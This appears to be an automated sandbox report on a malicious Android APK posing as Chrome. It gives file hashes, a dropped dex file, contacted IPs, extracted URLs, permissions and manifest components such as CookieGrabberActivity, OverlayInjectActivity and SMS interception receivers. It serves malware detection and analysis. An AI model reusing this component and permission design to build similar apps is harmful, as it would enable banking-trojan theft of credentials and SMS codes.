https://store-at-dre.hispace.dbankcloud.com/hwmarket/api/	grs_sdk_global_route_config_apptouchupdatesdk.json	false	Avira URL Cloud: safe	unknown
https://p1.meituan.net/scarlett/5b38551088d61b7b1a602c509432a65b767.png	packageSale.xml	false		high
https://catfront.dianping.com/api/metric?p=com.sankuai.mmp.fe.framework&v=1	wxjs.js	false		high
http://mobilegw.stable.alipay.net/mgw.htm	classes.dex, android	false		high
http://mobilegw-1-64.test.alipay.net/mgw.htm	classes.dex, android	false		high
https://h5.m.taobao.com/mlapp/olist.html	classes.dex, android	false		high
http://www.dpfile.com/sc/eleconfig/20170705162803bangkok.png	foreigncities.json	false		high
https://p0.meituan.net/travelcube/5e267eef0f37efcfa1c784d0890865b9370.png	mine_wallet.xml	false		high
http://www.dpfile.com/sc/eleconfig/20170627151736shouer.png	foreigncities.json	false		high
https://sdk01.hh-medic.com/familyapp	classes.dex, android	false	Avira URL Cloud: safe	unknown
https://wappaygw.alipay.com/service/rest.htm	classes.dex, android	false		high
http://p1.meituan.net/metplatformwhale/c1050ac69bbc1ae47b8db44056f14cd131606.png	image_url_mapping	false		high
https://%1$s/gslb/?ver=5.0	classes.dex, android	false		low
http://mobile.unionpay.com/getclient?platform=android&type=securepayplugin	classes.dex	false		high
https://i.meituan.com/awp/quic/bus/user-center.html?notitlebar=1	lbs_bus_homepage_default_config.json	false		high
https://%1$s/gslb/?ver=5.0%https://cn.register.xmpush.xiaomi.com	classes.dex	false		low
https://grs.dbankcloud.asia	grs_sdk_server_config.json	false		unknown
http://cpki-caweb.huawei.com/cpki/servlet/crlFileDown.crl?certype=1&/rootcrl.crl0	hmsincas.bks	false		high
http://www.dpfile.com/sc/eleconfig/20170627151445dongjing.png	foreigncities.json	false		high
http://p1.meituan.net/metplatformwhale/8dc911aca0bd1d076e9eee5f6fb22c43573.png	image_url_mapping	false		high
http://m.alipay.com/?action=h5quit/http://mclient.alipay.com/cashier/mobilepay.htm2http://mclient.al	classes.dex	false		high
https://grs.dbankcloud.com	grs_sdk_server_config.json	false		unknown
https://grs.dbankcloud.cn	grs_sdk_server_config.json	false		unknown
https://i.meituan.com/awp/quic/bus-realtime-fe/route-plan-list.html?notitlebar=1	lbs_bus_homepage_default_config.json	false		high
https://mozilla.org/MPL/2.0/	NOTICE	false		high
http://p1.meituan.net/metplatformwhale/873f3060be1dd20a048601af42629804326.png	image_url_mapping	false		high
https://data-dre.push.dbankcloud.com	grs_sdk_global_route_config_opendevicesdk.json	false		unknown
https://e.hh-medic.com	classes.dex, android	false		unknown
https://g-zt.kwai-pro.com(https://h5.m.taobao.com/mlapp/olist.htmlJhttps://imgfamily.hh-medic.com/me	classes.dex	false		low
https://mobilegw.alipay.com/mgw.htm	classes.dex, android	false		high
https://imgs.hh-medic.com/video/001/calling.mp3	classes.dex, android	false		unknown
https://data-drcn.push.dbankcloud.com	grs_sdk_global_route_config_opendevicesdk.json	false		unknown
http://mclient.alipay.com/cashier/mobilepay.htm	classes.dex, android	false		high
https://km.sankuai.com/collabpage/1715550785	wxjs.js	false		high
https://publicsuffix.org/list/public_suffix_list.dat	NOTICE	false		unknown
https://test.hh-medic.com#https://test.hh-medic.com/familyapp	classes.dex	false		unknown
http://www.dpfile.com/sc/eleconfig/20170627151802daban.png	foreigncities.json	false		high
https://metrics2.data.hicloud.com:6447	grs_sdk_global_route_config_opensdkService.json	false		high
https://p0.meituan.net/travelcube/7e12d3b1d16366e4749ea4fe9a9123ac480.png	mine_wallet.xml	false		high
http://wappaygw.alipay.com/service/rest.htm:http://xmlpull.org/v1/doc/features.html#process-namespac	classes.dex	false		high
https://mcgw.alipay.com/sdklog.do0https://mclient.alipay.com/cashier/mobilepay.htm3https://mclient.a	classes.dex	false		high
https://mclient.alipay.com/cashier/mobilepay.htm	classes.dex, android	false		high
http://www.dpfile.com/sc/eleconfig/20170905184843hanguo.png	foreigncities.json	false		high
http://p1.meituan.net/metplatformwhale/162f0a4bd78f9ad84ee3022e9be37f7117825.png	image_url_mapping	false		high
http://www.dpfile.com/sc/eleconfig/20170905185004dongjing.png	foreigncities.json	false		high
https://metrics-dra.dt.hicloud.com:6447	grs_sdk_global_route_config_opensdkService.json	false		high
https://mobilegw.alipaydev.com/mgw.htm	classes.dex, android	false		unknown
https://github.com/facebook/react-native/wiki/Breaking-Changes#d4611211-reactnativeandroidbreaking-m	classes.dex, android	false		high
https://grs.dbankcloud.eu	grs_sdk_server_config.json	false		unknown
http://mclient.alipay.com/home/exterfaceAssign.htm	classes.dex, android	false		high
http://p1.meituan.net/metplatformwhale/6ae04ce47421542eb3c353280d458335433.png	image_url_mapping	false		high
http://p0.meituan.net/metplatformwhale/48b4dd3bf6dc55fc4e7762a98a0f928c11327.png	image_url_mapping	false		high
https://p1.meituan.net/scarlett/2265a53c3be340bb8cc6837f52d85041225.png	couponPackage.xml	false		high
https://mclient.alipay.com/service/rest.htm#https://mobilegw.alipay.com/mgw.htm&https://mobilegw.ali	classes.dex	false		high
https://p0.meituan.net/travelcube/23608f47cd2f57e540e9c9525a4363ca3285.png	order_banner.xml	false		high
https://sec.hh-medic.com/orderapp	classes.dex, android	false		unknown
http://xmlpull.org/v1/doc/features.html#process-namespaces	classes.dex, android	false		unknown
http://p0.meituan.net/metplatformwhale/2102f5c663d6145c330b8d25f3330bc2375.png	image_url_mapping	false		high
https://test.hh-medic.com	classes.dex, android	false		unknown
https://awp.meituan.com/hfe/fep/aedec8031d714fd5a4128e94a6cf1e9f.html	web-holder.html	false		high
https://imgfamily.hh-medic.com/medic-collage/20210726/hp_line_up_image.jpg	classes.dex, android	false		unknown
http://p0.meituan.net/metplatformwhale/26bad7bfbb8cea766bdbc9c38e9487f2330.png	image_url_mapping	false		high
http://p0.meituan.net/metplatformwhale/a5ab11ef4c6e755261b5645ba3cf05d21163.png	image_url_mapping	false		high
https://cn.register.xmpush.xiaomi.com	classes.dex, android	false		high
http://p0.meituan.net/metplatformwhale/70dcf3187a1952c2a16721e26cf0e95c13021.png	image_url_mapping	false		high
http://p1.meituan.net/metplatformwhale/ee814226f585d7f19ed5ae684385a7871237.png	image_url_mapping	false		high
https://g-zt.kwai-pro.com	classes.dex, android	false		unknown
https://mclient.alipay.com/home/exterfaceAssign.htm?	classes.dex, android	false		high
http://p0.meituan.net/metplatformwhale/ca573fc7cf6682129ca700bb6faaeaab394.png	image_url_mapping	false		high
https://metrics5.data.hicloud.com:6447	grs_sdk_global_route_config_opensdkService.json	false		high
http://www.dpfile.com/sc/eleconfig/20170712211404singapore.png	foreigncities.json	false		high
http://api.waimai.meituan.com	DefaultAppConfiguration	false		high
http://p0.meituan.net/metplatformwhale/5bd94bb10e0d4717bca6b2301798927612152.png	image_url_mapping	false		high
https://mclient.alipay.com/service/rest.htm	classes.dex, android	false		high
https://test.hh-medic.com/familyapp	classes.dex, android	false		unknown
http://p0.meituan.net/metplatformwhale/d21a37f1de544aa842727b85d26428f656797.png	image_url_mapping	false		high
http://wappaygw.alipay.com/service/rest.htm	classes.dex, android	false		high
https://wappaygw.alipay.com/home/exterfaceAssign.htm?	classes.dex, android	false		high
http://p1.meituan.net/metplatformwhale/86b21891c97dd11332873aa2fbee58041214.png	image_url_mapping	false		high
https://loggw-exsdk.alipay.com/loggw/logUpload.do	classes.dex, android	false		high
https://vod.streamlakeapi.com5https://wappaygw.alipay.com/home/exterfaceAssign.htm?	classes.dex	false		unknown
http://m.alipay.com/?action=h5quit	classes.dex, android	false		high
https://wappaygw.alipay.com/service/rest.htm4huawei	classes.dex	false		high
https://mcgw.alipay.com/sdklog.do	classes.dex, android	false		high
https://s2-10924.kwimgs.com/kos/nlav10924/temp-arm-64_33baaad306f233e86da2215fd0c5fa95.zip	sodler.json	false		unknown
http://schemas.android.com/apk/res/android	a.xml, AndroidManifest.xml	false		high
http://mobilegw-1-64.test.alipay.net/mgw.htm&http://mobilegw.aaa.alipay.net/mgw.htm)http://mobilegw.	classes.dex	false		high
https://data-dra.push.dbankcloud.com	grs_sdk_global_route_config_opendevicesdk.json	false		unknown
https://vod.streamlakeapi.com	classes.dex, android	false		unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
135.181.49.35	unknown	Germany	24940	HETZNER-ASDE	false
149.154.167.99	unknown	United Kingdom	62041	TELEGRAMRU	false
193.168.141.67	unknown	Romania	50340	SELECTEL-MSKRU	false

General Information

Joe Sandbox Version:	38.0.0 Beryl
Analysis ID:	1315840
Start date and time:	2023-09-28 14:31:05 +02:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 7m 28s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	defaultandroidfilecookbook.jbs
Analysis system description:	Android 9 (Pie)
Analysis Mode:	default
APK Instrumentation enabled:	true
Sample file name:	Vezmhoup7U
Detection:	MAL
Classification:	mal100.rans.troj.spyw.expl.evad.and@0/253@0/0

Warnings

No interacted views
Not all non-executed APIs are in report
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing dynamic data code.

Joe Sandbox View / Context

IPs

⊘No context

Domains

⊘No context

ASNs

⊘No context

JA3 Fingerprints

⊘No context

Dropped Files

⊘No context

Created / dropped Files

/data/user/0/com.mtnyrvojt.qtbxtwjnq/app_app_dex/lkfupve.gvo

Download File

File Type:	Dalvik dex file version 035
Category:	dropped
Size (bytes):	3465772
Entropy (8bit):	6.4920329195595325
Encrypted:	false
SSDEEP:	24576:/9TvmHU3/LVnnIZidSTQa5bwO4c7wWSKitN3/cQsifHcy/43LzjtE3kkrlmuMfE8:/9iU3zVnnI5n4c75230WPLhuMXfQaWJP
MD5:	5D1177CF5F22D3FB457F266D39D93BEC
SHA1:	46CDA62A62BA4DB28C03E8C99FDDAA56F5D6BEEB
SHA-256:	B1315EB69AA70D923637CF5A797224611C26580BD40FDD31019798D43A694194
SHA-512:	2982027C996591FC7D0482FC4343BFF20D32EB3E55AE593D7A6D238D99B016B4AEFA2BFF67C0603ACBF5DB86C4E1F3D6D4C3E73A9DF3FFB52DE2FEEBD1DAD306
Malicious:	true
Reputation:	low
Preview:	dex.035..!...[..\..0".20K.....,.4.p...xV4.........P.4.":..p...h.......,................E...m..S...X...t]/....................0...N...u..................D..........(...X..................+...U..................=..._..................&...C...c..................-...]..............5..._..............=...z...........=.................K...x..............;...l..............F...}...........6...q.......q.........../...i..............e..............I..............=...}.....................R......Q..........R.........................R..........W......Z...........^..........%...q...........U..........P..............<...m...........)...k................W...........y..................`..........B..........K...........n...........=..............H...............l...........G.......x.......r...........=...........$.......c...............m...........a...............[...........2...w.......-...................i...........I...........{...3...............m...9...........

/data/user/0/com.mtnyrvojt.qtbxtwjnq/files/rnscus.huv

Download File

File Type:	Zip archive data (empty)
Category:	dropped
Size (bytes):	22
Entropy (8bit):	1.0476747992754052
Encrypted:	false
SSDEEP:	3:pjt/l:Nt
MD5:	76CDB2BAD9582D23C1F6F4D868218D6C
SHA1:	B04F3EE8F5E43FA3B162981B50BB72FE1ACABB33
SHA-256:	8739C76E681F900923B900C9DF0EF75CF421D39CABB54650C4B9AD19B6A76D85
SHA-512:	5E2F959F36B66DF0580A94F384C5FC1CEEEC4B2A3925F062D7B68F21758B86581AC2ADCFDDE73A171A28496E758EF1B23CA4951C05455CDAE9357CC3B5A5825F
Malicious:	false
Reputation:	low
Preview:	PK....................

Static File Info

General

File type:	Zip archive data, at least v0.0 to extract, compression method=store
Entropy (8bit):	7.992481659757923
TrID:	Android Package (27504/1) 56.12% Java Archive (13504/1) 27.55% ZIP compressed archive (8000/1) 16.32%
File name:	Vezmhoup7U
File size:	4'208'840 bytes
MD5:	e4e0ad27227e83a4e0536a6b5c05cf30
SHA1:	7901d85f316d293da81b8114b0523033d65d6b85
SHA256:	259e88f593a3df5cf14924eec084d904877953c4a78ed4a2bc9660a2eaabb20b
SHA512:	70d42621ad30fd26abc678628c8b7f17724c000d4a65c88bbb0fdb1ccf3fcbf4050175016bfccbb5084386c1e75e9011aaf4f4a0d28d04f86612828c048f6383
SSDEEP:	98304:Sz+QAqR2V4ePEj4JZSkU5MPH2auUkZ9ncMY8YkvlDrg:NqR2C03+zUIJcHkvlw
TLSH:	42163382F98D4520E8AD0FB85FE2D57345292F038E9AD22F3850B79CBC7AB550E55E31
File Content Preview:	PK........Y..W.$..Hi..Hi......AndroidManifest.xml.......Hi......\|$..............\|..................."...&...*.......:...X...\...`...p..........................................."...8...^...........................................(..........................

File Icon

Static APK Info

General

Label:	Chrome
Minimum SDK required:	26
Target SDK required:	31
Version Code:	999
Version Name:	9.9.9
Package Name:	com.mtnyrvojt.qtbxtwjnq
Is Activity:	true
Is Receiver:	true
Is Service:	true
Requests System Level Permissions:	false
Play Store Compatible:	true

Activities

Name	Is Entrypoint
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.ChangeSmsDefaultAppActivity
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.DozeModeActivity
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.MainActivity	true
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.OverlayInjectActivity
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.AccessibilityEnableHintActivity
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.IDLEActivity
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.CookieGrabberActivity
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.PermissionActivity
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.SmsComposeActivity
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.AdminActivity
com.mtnyrvojt.qtbxtwjnqcom.mtnyrvojt.qtbxtwjnq.activities.PlayProtectActivity

Receivers

com.mtnyrvojt.qtbxtwjnq.services.AdminReceiver	Intent: android.app.action.DEVICE_ADMIN_DISABLED (Priority 1000), android.app.action.ACTION_DEVICE_ADMIN_DISABLE_REQUESTED (Priority 1000), android.app.action.DEVICE_ADMIN_ENABLED (Priority 1000)
com.mtnyrvojt.qtbxtwjnq.services.AlarmReceiver
com.mtnyrvojt.qtbxtwjnq.services.BootReceiverService	Intent: android.intent.action.BOOT_COMPLETED, android.intent.action.LOCKED_BOOT_COMPLETED, android.intent.action.REBOOT, android.intent.action.QUICKBOOT_POWERON, android.intent.action.USER_PRESENT, android.intent.action.SCREEN_OFF
com.mtnyrvojt.qtbxtwjnq.services.DummyReceiver	Intent: android.provider.Telephony.SMS_DELIVER, android.provider.action.DEFAULT_SMS_PACKAGE_CHANGED, android.provider.action.EXTERNAL_PROVIDER_CHANGE, android.appwidget.action.APPWIDGET_UPDATE, com.moez.QKSMS.intent.action.ACTION_NOTIFY_DATASET_CHANGED
com.mtnyrvojt.qtbxtwjnq.services.MmsReceiver	Intent: android.provider.Telephony.WAP_PUSH_DELIVER
com.mtnyrvojt.qtbxtwjnq.services.SmsReceiver	Intent: android.provider.Telephony.SMS_RECEIVED, android.provider.Telephony.SMS_DELIVER

Services

com.mtnyrvojt.qtbxtwjnq.services.FitnessAccessibilityService	Intent: android.accessibilityservice.AccessibilityService (Priority 0)
com.mtnyrvojt.qtbxtwjnq.services.HeadlessSmsSendService	Intent: android.intent.action.RESPOND_VIA_MESSAGE (Priority 0)
com.mtnyrvojt.qtbxtwjnq.services.KingService
com.mtnyrvojt.qtbxtwjnq.services.NotificationService	Intent: android.service.notification.NotificationListenerService (Priority 0)

Permission Requested

android.permission.ACCESS_NETWORK_STATE

android.permission.BIND_CARRIER_MESSAGING_CLIENT_SERVICE

android.permission.CALL_PHONE

android.permission.FOREGROUND_SERVICE

android.permission.INTERNET

android.permission.KILL_BACKGROUND_PROCESSES

android.permission.MANAGE_EXTERNAL_STORAGE

android.permission.QUERY_ALL_PACKAGES

android.permission.READ_EXTERNAL_STORAGE

android.permission.READ_PHONE_NUMBERS

android.permission.READ_PHONE_STATE

android.permission.READ_SMS

android.permission.RECEIVE_BOOT_COMPLETED

android.permission.RECEIVE_SMS

android.permission.REQUEST_DELETE_PACKAGES

android.permission.REQUEST_IGNORE_BATTERY_OPTIMIZATIONS

android.permission.SEND_SMS

android.permission.SYSTEM_ALERT_WINDOW

android.permission.USE_FULL_SCREEN_INTENT

android.permission.WAKE_LOCK

android.permission.WRITE_EXTERNAL_STORAGE

android.permission.WRITE_SETTINGS

Certificate

Name:
Issuer:
Subject:

Resources

Name	Type	Size
easygo.json	JSON data	1707
order_banner.xml	XML 1.0 document, Unicode text, UTF-8 text	4424
tremble_fragment.fsh	C source, ASCII text	966
grs_sdk_global_route_config_apptouchupdatesdk.json	JSON data	2570
alita_mtmall-biz-dynamic-assemble-preset.zip	Zip archive data, at least v1.0 to extract, compression method=deflate	6607
main.js	C source, Unicode text, UTF-8 text, with very long lines (28879), with no line terminators	28939
jsconfig.json	JSON data	52
ic_launcher.png	PNG image data, 144 x 144, 8-bit/color RGBA, non-interlaced	13925
mine_services.xml	XML 1.0 document, ASCII text	5176
passport_lottie_loading.json	JSON data	3535
ic_launcher.png	PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced	3867
blurry_fragment_horizontal.fsh	C source, ASCII text	1084
ic_launcher.png	PNG image data, 192 x 192, 8-bit/color RGBA, non-interlaced	19156
maoyan_advert_id_config	Unicode text, UTF-8 text	536
ic_launcher.png	PNG image data, 72 x 72, 8-bit/color RGBA, non-interlaced	6342
style_extra.data	data	1086
travel_triprn_scenicticket.sk	PDP-11 UNIX/RT ldp	631
transform_fragment.fsh	Unicode text, UTF-8 text	2120
oneclickpay_loading.json	JSON data	4528
kotlin.kotlin_builtins	data	14707
cnb.js	ASCII text	282
img_0.png	PNG image data, 15 x 12, 8-bit colormap, non-interlaced	233
ag_sdk_cbg_root.cer	PEM certificate	1931
grs_sp.bks	data	1470
foreigncities.json	JSON data	12666
wxjs.js	Unicode text, UTF-8 text	8894
grs_sdk_global_route_config_opensdkService.json	JSON data	9896
soul_escape_fragment.fsh	C source, ASCII text	949
publicsuffixes.gz	gzip compressed data, from FAT filesystem (MS-DOS, OS/2, NT), original size modulo 2^32 101915	36752
MANIFEST.MF	ASCII text, with CRLF line terminators	9447
annotation.kotlin_builtins	data	926
hmsincas.bks	data	3081
Wish_Score.TTF	OpenType font data	1844
rnscus.huv	zlib compressed data	22
new_rocket_store.json	Unicode text, UTF-8 text, with very long lines (14947), with no line terminators	15011
new_store_rocket.json	Unicode text, UTF-8 text, with very long lines (14941), with no line terminators	15005
food_skeleton_poi_new_meal.sk	PDP-11 UNIX/RT ldp	202
NOTICE	ASCII text	218
CERT.SF	ASCII text, with CRLF line terminators	9541
qcs_passenger_line_dot.png	PNG image data, 16 x 16, 4-bit colormap, non-interlaced	242
rum_modules.json	ASCII text, with very long lines (65536), with no line terminators	241906
mtmall_lottie_loading.json	JSON data	16046
food_skeleton_poi_head_info_below.sk	PDP-11 UNIX/RT ldp	111
wm_sc_home_store.json	Unicode text, UTF-8 text, with very long lines (8819), with no line terminators	8925
lkfupve.gvo	zlib compressed data	1367895
preparse_search_home_response.json	JSON data	6704
internal.kotlin_builtins	data	758
resources.arsc	data	2836
DiagnosticPublicKey	data	1024
oneclickpay_succ.json	Unicode text, UTF-8 text	9854
trip_traffic_more_service.sk	PDP-11 UNIX/RT ldp	657
ranges.kotlin_builtins	data	2301
web-holder.html	HTML document, ASCII text, with very long lines (871)	987
blurry_fragment_vertical.fsh	C source, ASCII text	1196
native-bundle-main.js	C source, Unicode text, UTF-8 text, with very long lines (3787), with no line terminators	4157
PicassoViewMapping_1	Biosig/EDF: European Data format	6058
PicassoProtocolMapping_1	ASCII text, with no line terminators	66
h5_qr_back.png	PNG image data, 26 x 42, 8-bit gray+alpha, non-interlaced	116
b.xml	Android binary XML	316
collections.kotlin_builtins	data	3685
hybrid_cashier_preset_config.json	JSON data	999
phx_homepage.sk	PDP-11 UNIX/RT ldp	956
multi_fragment.fsh	C source, ASCII text	363
a	ASCII text, with very long lines (37330), with no line terminators	37330
mine_wallet.xml	XML 1.0 document, Unicode text, UTF-8 text	9273
wm_sc_home_up.json	Unicode text, UTF-8 text, with very long lines (4459), with no line terminators	4553
CERT.RSA	data	1355
trip_traffic_gt_submit_order.sk	PDP-11 UNIX/RT ldp	371
qcsc_driverinfo_upgrade.json	Unicode text, UTF-8 text, with very long lines (6927), with no line terminators	7039
img_0.png	PNG image data, 452 x 168, 8-bit colormap, non-interlaced	7164
sodler.json	JSON data	1244
hotel_poi_detail.sk	PDP-11 UNIX/RT ldp	332
DefaultAppConfiguration	JSON data	100
grs_sdk_global_route_config_opendevicesdk.json	JSON data	1922
adsHomeBannerA.xml	XML 1.0 document, ASCII text, with very long lines (2935), with no line terminators	2935
hotel_submit_order.sk	PDP-11 UNIX/RT ldp	787
mtmall_lottie_refresh_pull.json	JSON data	12365
mscwxjs.js	Unicode text, UTF-8 text	4644
TypeData.json.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	4270
TypeData.json	JSON data	21955
lbs_bus_homepage_default_config.json	JSON data	982
a.xml	Android binary XML	564
food_skeleton_poi_member.sk	PDP-11 UNIX/RT ldp	111
mine_game.xml	XML 1.0 document, Unicode text, UTF-8 text	3832
couponPackage.xml	XML 1.0 document, ASCII text, with very long lines (2133), with no line terminators	2133
qcs_line_arrow.png	PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced	212
PhxAllCityMap.json.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	9852
PhxAllCityMap.json	JSON data	83217
packageSale.xml	XML 1.0 document, Unicode text, UTF-8 text, with very long lines (18446), with no line terminators	18496
alpha_fragment.fsh	ASCII text	549
img_2.png	PNG image data, 54 x 54, 8-bit colormap, non-interlaced	538
qcsc_passenger_line_dot.png	PNG image data, 16 x 16, 4-bit colormap, non-interlaced	242
ms_com.sankuai.meituan	PNG image data, 60 x 60, 8-bit/color RGBA, non-interlaced	5007
mtm_mach_preset.json	JSON data	6101
msc_min_versions.json	JSON data	49
trip_traffic_grab_info_filling.sk	PDP-11 UNIX/RT ldp	384
MetaData.json.zip	Zip archive data, at least v2.0 to extract, compression method=deflate	2119
MetaData.json	JSON data	15656
lottie_popcorn.json	JSON data	1990
reflect.kotlin_builtins	data	5019
lottie_zan.json	JSON data	2224
new_home_store.json	JSON data	8692
travel_aroundtravel.sk	PDP-11 UNIX/RT ldp	800
c.json	JSON data	901
AndroidManifest.xml	data	26952
image_url_mapping	JSON data	1979
future_king_kong.json	JSON data	858
hianalytics_njjn	ASCII text, with very long lines (588), with no line terminators	588
MaoYanHeiTi-H.otf	OpenType font data	4736
wm_comment_useful_animation.json	Unicode text, UTF-8 text, with very long lines (6076), with no line terminators	6156
qcsc_emergency_trip_share.png	PNG image data, 217 x 217, 8-bit colormap, non-interlaced	7577
ic_launcher.png	PNG image data, 96 x 96, 8-bit/color RGBA, non-interlaced	8982
picasso-controller-bundle.js	ASCII text	304
postcode.json	JSON data	12005
grs_sdk_server_config.json	JSON data	326
hotel_home_page.sk	PDP-11 UNIX/RT ldp	449
default.vsh	C source, ASCII text	159
img_1.png	PNG image data, 54 x 54, 8-bit colormap, non-interlaced	407
version.txt	ASCII text, with no line terminators	13
coroutines.kotlin_builtins	data	200
classes.dex	Dalvik dex file version 035	6226888
qcsc_line_arrow.png	PNG image data, 14 x 14, 8-bit/color RGBA, non-interlaced	212
lkfupve.gvo.dr	Dalvik dex file version 035	3465772
rnscus.huv.dr	Zip archive data (empty)	22

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 28, 2023 14:31:23.261018038 CEST	33184	443	192.168.2.30	142.251.32.74
Sep 28, 2023 14:31:23.261259079 CEST	49778	443	192.168.2.30	142.251.33.170
Sep 28, 2023 14:31:25.821049929 CEST	49776	443	192.168.2.30	142.251.33.170
Sep 28, 2023 14:31:31.837166071 CEST	47584	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:31:31.928841114 CEST	853	47584	8.8.4.4	192.168.2.30
Sep 28, 2023 14:31:32.477159023 CEST	40818	443	192.168.2.30	142.250.72.110
Sep 28, 2023 14:31:32.477195024 CEST	40820	443	192.168.2.30	142.250.72.110
Sep 28, 2023 14:31:33.501193047 CEST	49778	443	192.168.2.30	142.251.33.170
Sep 28, 2023 14:31:33.501211882 CEST	33184	443	192.168.2.30	142.251.32.74
Sep 28, 2023 14:31:36.061148882 CEST	49776	443	192.168.2.30	142.251.33.170
Sep 28, 2023 14:31:36.813652992 CEST	47584	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:31:36.813815117 CEST	47584	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:31:36.905481100 CEST	853	47584	8.8.4.4	192.168.2.30
Sep 28, 2023 14:31:36.905917883 CEST	47584	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:31:51.420993090 CEST	40820	443	192.168.2.30	142.250.72.110
Sep 28, 2023 14:31:51.421144009 CEST	40818	443	192.168.2.30	142.250.72.110
Sep 28, 2023 14:31:53.980984926 CEST	33184	443	192.168.2.30	142.251.32.74
Sep 28, 2023 14:31:53.981590033 CEST	49778	443	192.168.2.30	142.251.33.170
Sep 28, 2023 14:31:56.540998936 CEST	49776	443	192.168.2.30	142.251.33.170
Sep 28, 2023 14:32:07.638725042 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:32:07.640290976 CEST	56890	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:07.640290976 CEST	56888	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:07.654004097 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:32:07.932821035 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:32:07.948811054 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:32:08.228933096 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:32:08.244869947 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:32:08.380944014 CEST	56888	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:08.508965969 CEST	56890	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:08.828913927 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:32:08.892904043 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:32:09.148936987 CEST	56888	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:09.469036102 CEST	56890	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:10.045011997 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:32:10.108967066 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:32:10.684894085 CEST	56888	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:11.324892998 CEST	56890	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:12.413026094 CEST	56190	443	192.168.2.30	142.250.80.4
Sep 28, 2023 14:32:12.476968050 CEST	46786	443	192.168.2.30	142.250.65.234
Sep 28, 2023 14:32:13.608292103 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.692930937 CEST	56888	443	192.168.2.30	142.251.41.35
Sep 28, 2023 14:32:13.699434042 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:13.699598074 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.707329035 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:13.707392931 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:13.707432032 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.707441092 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:13.707458973 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.707535028 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:13.707556009 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.707617044 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.722927094 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.814325094 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:13.814426899 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:13.814727068 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.855034113 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.910621881 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:13.912214994 CEST	853	47592	8.8.4.4	192.168.2.30
Sep 28, 2023 14:32:13.912349939 CEST	47592	853	192.168.2.30	8.8.4.4
Sep 28, 2023 14:32:13.915498018 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:13.915565014 CEST	443	60630	142.251.41.10	192.168.2.30
Sep 28, 2023 14:32:13.915658951 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:13.919604063 CEST	60630	443	192.168.2.30	142.251.41.10
Sep 28, 2023 14:32:13.919620991 CEST	443	60630	142.251.41.10	192.168.2.30
